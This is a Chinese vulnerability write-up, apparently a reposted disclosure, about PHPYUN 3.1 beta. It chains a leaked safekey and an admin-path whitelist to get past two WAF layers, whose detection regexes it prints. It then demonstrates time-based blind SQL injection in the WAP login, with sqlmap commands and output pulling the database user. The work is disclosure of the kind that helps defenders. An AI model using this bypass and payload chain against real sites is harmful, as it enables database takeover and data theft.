来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 由某处SQL注入引起,最终通过组合漏洞击溃PHPYUN测试版本:PHPYUN 3 1 GBK beta 20140728PHPYUN使用了两套waf,一套自己写的,一套360的,从第一套开始。 data db safety php:quotesGPC(); 效果:addsl...
测试版本:PHPYUN 3.1 GBK beta 20140728
quotesGPC(); // 效果:addslashes if($config['sy_istemplate']!='1' || md5(md5($config['sy_safekey']).$_GET['m'])!=$_POST['safekey']) { foreach($_POST as $id=>$v){ safesql($id,$v,"POST",$config); $id = sfkeyword($id,$config); $v = sfkeyword($v,$config); $_POST[$id]=common_htmlspecialchars($v); } } foreach($_GET as $id=>$v){ safesql($id,$v,"GET",$config); $id = sfkeyword($id,$config); $v = sfkeyword($v,$config); if(!is_array($v)) $v=substr(strip_tags($v),0,80); $_GET[$id]=common_htmlspecialchars($v); } foreach($_COOKIE as $id=>$v){ safesql($id,$v,"COOKIE",$config); $id = sfkeyword($id,$config); $v = sfkeyword($v,$config); $v=substr(strip_tags($v),0,52); $_COOKIE[$id]=common_htmlspecialchars($v); }
safesql($id,$v,"POST",$config); $id = sfkeyword($id,$config); $v = sfkeyword($v,$config); $_POST[$id]=common_htmlspecialchars($v);
if($config['sy_istemplate']!='1' || md5(md5($config['sy_safekey']).$_GET['m'])!=$_POST['safekey']) { foreach($_POST as $id=>$v){ safesql($id,$v,"POST",$config); $id = sfkeyword($id,$config); $v = sfkeyword($v,$config); $_POST[$id]=common_htmlspecialchars($v); } }
$config['sy_istemplate']!='1' || md5(md5($config['sy_safekey']).$_GET['m'])!=$_POST['safekey']
$r=rand(10000000,99999999); mysql_query("update $table_config set `config`='$r' where `name`='sy_safekey'");
<tr> <th width="160">系统安全码:</th> <td><input class="input-text tips_class" type="text" name="sy_safekey" id="sy_safekey" value="<?php echo $this->_tpl_vars['config']['sy_safekey']; ?> " size="40" maxlength="255"/><font color="gray" style="display:none">系统部分功能使用的加密串,请自定义修改,如:986jhgyutw.*x</font></td> <td width="160">sy_safekey</td> </tr>
<tr> <th width="160">系统安全码:</th> <td><input class="input-text tips_class" type="text" name="sy_safekey" id="sy_safekey" value="{yun:}$config.sy_safekey{/yun}" size="40" maxlength="255"/><font color="gray" style="display:none">系统部分功能使用的加密串,请自定义修改,如:986jhgyutw.*x</font></td> <td width="160">sy_safekey</td> </tr>
function index_action(){ if($this->uid!=$_GET['id']&&$_COOKIE['usertype']=='1'){ ... ... ... } if($_POST['submit']) { ... ... ... } if($_POST['submit2']) { ... ... ... } ... ... ... $tp=$_GET['tp']?$_GET['tp']:"index"; $this->seo("company_".$tp); $this->yunset("com_style",$this->config['sy_weburl']."/template/company/".$tplurl."/"); $this->yunset("comstyle","../template/company/".$tplurl."/"); $this->yunset("defaultstyle","../template/default/"); $this->yuntpl(array('company/'.$tplurl."/".$tp)); }
if(is_file(LIB_PATH.'webscan360/360safe/360webscan.php')){ require_once(LIB_PATH.'webscan360/360safe/360webscan.php'); }
//get拦截规则 $getfilter = "<[^>]*?=[^>]*?&#[^>]*?>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\()|<[^>]*?\\b(onerror|onmousemove|onload|onclick|onmouseover)\\b[^>]*?>|^\\+\\/v(8|9)|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)"; //post拦截规则 $postfilter = "<[^>]*?=[^>]*?&#[^>]*?>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\()|<[^>]*?\\b(onerror|onmousemove|onload|onclick|onmouseover)\\b[^>]*?>|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)"; //cookie拦截规则 $cookiefilter = "\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
if ($webscan_switch&&webscan_white($webscan_white_directory,$webscan_white_url)) { if ($webscan_get) { foreach($_GET as $key=>$value) { webscan_StopAttack($key,$value,$getfilter,"GET"); // 对GET进行过滤 } } if ($webscan_post) { foreach($_POST as $key=>$value) { webscan_StopAttack($key,$value,$postfilter,"POST"); // 对POST进行过滤 } } if ($webscan_cookie) { foreach($_COOKIE as $key=>$value) { webscan_StopAttack($key,$value,$cookiefilter,"COOKIE"); // 对COOKIE进行过滤 } } if ($webscan_referre) { foreach($webscan_referer as $key=>$value) { webscan_StopAttack($key,$value,$postfilter,"REFERRER"); // 对REFERER头进行过滤 } } }
if ($webscan_switch&&webscan_white($webscan_white_directory,$webscan_white_url)) {
/** * 拦截目录白名单 */ function webscan_white($webscan_white_name,$webscan_white_url=array()) { $url_path=$_SERVER['PHP_SELF']; $url_var=$_SERVER['QUERY_STRING']; if (preg_match("/".$webscan_white_name."/is",$url_path)==1) { return false; } foreach ($webscan_white_url as $key => $value) { if(!empty($url_var)&&!empty($value)){ if (stristr($url_path,$key)&&stristr($url_var,$value)) { return false; } } elseif (empty($url_var)&&empty($value)) { if (stristr($url_path,$key)) { return false; } } } return true; }
//后台白名单,后台操作将不会拦截,添加"|"隔开白名单目录下面默认是网址带 admin /dede/ 放行 $webscan_white_directory='admin|\/dede\/|\/install\/'; //url白名单,可以自定义添加url白名单,默认是对phpcms的后台url放行 //写法:比如phpcms 后台操作url index.php?m=admin php168的文章提交链接post.php?job=postnew&step=post ,dedecms 空间设置edit_space_info.php $webscan_white_url = array('index.php' => 'admin_dir=admin','post.php' => 'job=postnew&step=post','edit_space_info.php'=>'');
function quotesGPC() { if(!get_magic_quotes_gpc()){ $_POST = array_map("addSlash", $_POST); $_GET = array_map("addSlash", $_GET); $_COOKIE = array_map("addSlash", $_COOKIE); } } function addSlash($el) { if (is_array($el)) return array_map("addSlash", $el); else return addslashes($el); }
function index_action() { $this->get_moblie(); // 通过UA判断是否是手机端 if($this->uid || $this->username) { $this->wapheader('member/index.php'); //登陆用户跳转 } if($_POST['submit']) { if($_POST['wxid']) { $wxparse = '&wxid='.$_POST['wxid']; } $usertype=$_POST['usertype']?intval($_POST['usertype']):1; $username = str_replace('\\','',$_POST['username']); // 漏洞点:过滤\ if($usertype>0 && $username!='') { $userinfo = $this->obj->DB_select_once("member","`username`='".str_replace('\\','',$_POST['username'])."' and usertype='".$usertype."'","username,usertype,password,uid,salt"); ... ... ...
漏洞证明:参数username为注册的用户名,参数usertype为注册的用户类型,然后用之前的方法获得safekey后,使用SQLMAP: root@kali:/usr/share/sqlmap/tamper# sqlmap -u "http://192.168.254.136/phpyun/728/wap/index.php?m=login&c=index&admin_dir=admin" --data="submit=1&wxid=1&usertype=2&username=just4fun&safekey=53b6ad0cc21db28388507743269aa19d" --threads=10 --dbms=mysql -p username --risk=5 --level=3 --user-agent=iphone --flush-session ... ... ... ... POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y sqlmap identified the following injection points with a total of 823 HTTP(s) requests: --- Place: POST Parameter: username Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: submit=1&wxid=1&usertype=2&username=just4fun' AND SLEEP(5) AND 'MPUx'='MPUx&safekey=53b6ad0cc21db28388507743269aa19d --- [01:04:39] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.3.13, Apache 2.2.22 back-end DBMS: MySQL 5.0.11 [01:04:39] [INFO] fetched data logged to text files under './output/192.168.254.136' [*] shutting down at 01:04:39
root@kali:/usr/share/sqlmap/tamper# sqlmap -u "http://192.168.254.136/phpyun/728/wap/index.php?m=login&c=index&admin_dir=admin" --data="submit=1&wxid=1&usertype=2&username=just4fun&safekey=53b6ad0cc21db28388507743269aa19d" --threads=10 --dbms=mysql -p username --risk=5 --level=3 --user-agent=iphone --current-user sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 01:09:14 [01:09:14] [WARNING] provided parameter 'username' is not inside the GET [01:09:14] [INFO] testing connection to the target url sqlmap got a 302 redirect to 'http://192.168.254.136:80/phpyun/728/wap/index.php'. Do you want to follow? [Y/n] n sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: username Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: submit=1&wxid=1&usertype=2&username=just4fun' AND SLEEP(5) AND 'MPUx'='MPUx&safekey=53b6ad0cc21db28388507743269aa19d --- [01:09:15] [INFO] testing MySQL [01:09:15] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n [01:09:25] [INFO] confirming MySQL [01:09:25] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads [01:09:35] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.3.13, Apache 2.2.22 back-end DBMS: MySQL >= 5.0.0 [01:09:35] [INFO] fetching current user [01:09:35] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically [01:09:35] [INFO] retrieved: root@localhost current user: 'root@localhost' [01:14:57] [INFO] fetched data logged to text files under './output/192.168.254.136' [*] shutting down at 01:14:57 root@kali:/usr/share/sqlmap/tamper#
修复方案:1、修复泄露safekey的问题 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com